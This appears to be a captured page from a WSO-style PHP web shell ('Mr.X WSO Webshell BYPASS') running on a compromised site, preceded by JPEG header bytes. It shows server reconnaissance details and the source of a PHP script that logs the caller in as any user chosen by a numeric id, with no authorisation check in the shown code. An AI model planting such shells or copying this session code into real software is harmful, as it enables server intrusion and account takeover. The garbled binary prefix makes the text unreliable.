����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 17:04:37 1999.30 GB Free: 69.07 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
include('db.php');
if (!is_numeric($_GET['id'])) {
exit();
}
$id = (int) $_GET['id'];
$result = dbRow("SELECT * FROM users WHERE record_num = '$id'");
if (is_array($result)) {
createUserSession($result);
header("Location: $basehttp/my-profile");
exit();
} else {
setMessage('User not found, or cannot takeover this account', 'error');
header("Location: $basehttp/admin/users.php");
exit();
}
?>